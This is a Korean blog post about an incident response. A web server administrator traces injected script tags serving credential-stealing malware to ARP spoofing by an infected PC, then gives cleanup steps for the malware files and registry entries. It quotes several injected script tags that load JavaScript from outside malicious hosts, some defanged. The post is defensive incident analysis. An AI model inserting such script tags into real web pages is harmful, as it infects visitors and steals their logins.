관리 메뉴

Black&White

웹서버에 삽입된 자바스크립트(yahoo.js)에 의해 악성프로그램 다운로드 문제 본문

Security

웹서버에 삽입된 자바스크립트(yahoo.js)에 의해 악성프로그램 다운로드 문제

V.E.N 2010.09.08 22:43

내가 관리하고 있는 웹서버에 자바스크립트가 삽입되어 웹사이트에 방문하는 사용자들에게 악성프로그램을 다운로드 하도록 하는 일이 발생되었다.

웹개발자는 방화벽이 해킹당해, 방화벽에 의해 악성코드가 삽입되고 있다는 멍청한 소리를 해대고 있고, 일단 증상을 보아하니 DNS Spoofing 으로 의심이 되어 문제가 되고 있는 웹서버에서 tcpdump 를 떠놓고, 웹로그를 분석하기 시작했다.
웹로그상에서는 별다른 내용을 찾아낼 수 없었고, 잠시뒤 다시 웹사이트에 들어가니 자바스크립트가 실행된다고 하여 확인해 보니 yahoo.js 스크립트를 실행하겠냐고 하는 팝업창이 떴다.
웹페이스 소스를 확인해 보니 아래 스크립트가 삽입되어 있었다.(Firefox 에서는 스크립트 실행안됨)
<script src=http:// www. faloge. com/js/yahoo . js></script>

그순간 tcpdump 를 확인해 보니, arp spoofing 이 발생되고 있는 것을 확인했고,
arp spoofing 공격이 발생되면, 보통 게이트웨이의 MAC Address 를 속이기 위해 arp reply 가 끊임없이 올라온다. 이를 확인하기 위해서 tcpdump -n arp 라고 입력하면 쉽게 확인할 수 있다.
MAC Address 까지 위변조가 된것이면, 이넘을 어떻해 찾나 천상 스위치에서 확인해 봐야 할텐데 하는 마음으로
우선 IP Scanning 을 통해 해당 MAC Address 의 IP 를 찾을 수 있었다. 다행이도 MAC Address 까지 위변조가 되진 않았다.

ARP Spoofing 을 하고 있던 IP 로 원격으로 들어가서 해당 프로세스를 확인해 보니,
nvsvc.exe 라는 넘이 보였다.
바로 nvsvc.exe kill 하고 나니 Arp Spoofing 이 멈췄다.
하지만 이내 곧 다시 Arp Spoofing 이 시작되었고, 다시 PC에서 해당 프로세스를 확인해 보니 nvsvc.exe 가 다시 실행이 되고 있는 것이 아닌가
아, nvsvc.exe 가 살아 있는지 죽어있는지 감시하는 넘이 있다는 것을 직감하고, 다시 또 찾아보았다.
smx4pnp.dll 이라는 넘을 찾을 수 있었다.
이넘은 dll 이기 때문에 바로 실행되는 것이 아니라 rundll.exe 로 실행이 되고 있었다. 작업관리자에서 rundll.exe 를 kill 하고 nvsvc.exe 를 kill 했더니 더이상 Arp Spoofing 이 되지 않았다.

아울러, 추가적인 조치로
c:\windows\system32\nvsvc.exe
c:\document and settings\사용자계정명\Microsoft\smx4pnp.dll
위치한 파일을 삭제해야 된다.

시작레지스트리에도 이넘들은 포함이 되어 있으므로, regedit.exe 를 실행하여, 조놈들 이름으로 검색하면 쉽게 레지스트리 키값을 찾을 수 있으므로, 레지스트리에서도 제거하면 된다.
기본적으로 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 에 위치해 있을테지만, 혹시 모르니 nvsvc.exe 와 smx4pnp.dll 파일을 검색해서 찾는 것이 확실할 것이다.

정리해보면, 웹서버를 방문하는 사용자 입장에서는 웹서버의 페이지에 삽입되어 있는 스크립트 <script src=http:// www. faloge. com /js/ yahoo .js></script> 에 의해 멋모르는 사용자는 이 스크립트를 실행하게 되었을테고, 스크립트가 실행되어 악성프로그램을 다운로드하게 되었다. 이 악성프로그램은 사용자가 특정 게임사이트에 로그인할 경우, ID와 Password 를 수집하여 해커에게 이 정보를 전송당하는 구조였던 것이다.
하지만 웹개발자 입장에서는 웹소스를 보면, 아무런 이상이 없었을 테고 즉 웹서버와 웹브라우저 사이에서 악성코드가 삽입이 되었기 때문에 말이다.

결과론적으로, 웹서버와 같은 네트워크 대역에 있는 PC 가 arp spoofing 을 하도록 하는 바이러스에 감염이 되었던 것이 1차적인 원인이 되었던 것인데....

이래서, 웹서버와 PC단의 네트워크는 분리가 되어야 한다.
그렇게 얘기를 해도 안먹히는 현실이 문제 ㅎㅎㅎ


아무튼, 관련된 내용을 좀더 뒤져 보니 안랩에서 바로 전날 이와 관련된 보안공지를 했네...ㅎㅎ
http://www.ahnlab.com/kr/site/securitycenter/asec/asecIssueList.do?svccode=aa1001&contentscode=295

위 내용을 자세히 읽어보면, 충분히 도움이 될 것이며, 현재 nvsvc.exe , smx4pnp.dll 바이러스 파일은 V3 에 의해 탐지가 되고 있다.


또, 구글에서 검색을 해보니 웹서버에 yahoo.js 스크립트가 삽입되어 있는 웹서버들이 정말 많았다.
이 글을 읽게되는 IE(인터넷 익스플로워) 브라우저 사용자들은 팝업되는 메시지를 잘 확인하고, 다운받는 파일들을 잘 살펴 보아야 할 것이다. Firefox 브라우저를 사용하는 유저들은 크게 걱정할 필요가 없다. ㅡㅡ'



검색된 내용을 자세히 살펴보면, yahoo.js 가 업로드되어 있는 사이트가 www. faloge. com 만이 아닌게 아닌가
또한 악성스크립트의 이름은 yahoo.js 만이 아니라 여러개가 존재할 수 있다는 사실을 알게 되었다.

Arp Spoofing 에 의해 웹사이트의 페이지 삽입이 되는 공격은 아닌, SQL Injection 에 의한 스크립트 삽입이 이미 2010년 6월부터 notice 되어 있었다.

<script src=hxxp://ww.robint.us/u.js></script>
<script src=”hxxp://2677.in/yahoo.js”></script>


아래는 해당 내용이 Notice 되어 있는 곳이다.


출처: http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html

Mass infection of IIS/ASP sites robint.us



2 Comments
댓글쓰기 폼